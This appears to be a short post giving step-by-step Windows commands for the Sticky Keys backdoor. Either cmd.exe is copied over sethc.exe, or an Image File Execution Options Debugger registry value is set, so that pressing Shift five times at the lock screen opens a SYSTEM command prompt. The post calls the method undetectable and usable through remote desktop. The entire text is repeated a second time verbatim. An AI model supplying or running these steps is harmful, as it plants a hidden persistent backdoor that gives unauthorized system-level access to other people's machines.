You can have a system shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro to change files.
1. Make a backup of the original sethc.exe
copy c:\windows\system32\sethc.exe c:\
2. Copy cmd.exe into sethc.exe's place
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
3. Restart & hit Shift key 5 times, cmd.exe will pop up!
There's also another way of doing this just before you log-out the last time from this machine. Start an elevated cmd and type:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
After reboot, it should be fine hitting 5 times Shift key to gain access :)
The exploit is currently unpatched, and seems to work in both Windows 7, Windows 8 & Windows Server 2008 R2. Plus, if the code is installed, it's possible to perform it through remote desktop. The hack is undetectable when using the registry key. Essentially, the above code sets the debugger for Sticky Keys to the exe file for the command line applet, which is run at the system level when the machine is locked!
1. Make a backup of the original sethc.exe
copy c:\windows\system32\sethc.exe c:\
2. Copy cmd.exe into sethc.exe's place
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
3. Restart & hit Shift key 5 times, cmd.exe will pop up!
There's also another way of doing this just before you log-out the last time from this machine. Start an elevated cmd and type:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
After reboot, it should be fine hitting 5 times Shift key to gain access :)
The exploit is currently unpatched, and seems to work in both Windows 7, Windows 8 & Windows Server 2008 R2. Plus, if the code is installed, it's possible to perform it through remote desktop. The hack is undetectable when using the registry key. Essentially, the above code sets the debugger for Sticky Keys to the exe file for the command line applet, which is run at the system level when the machine is locked!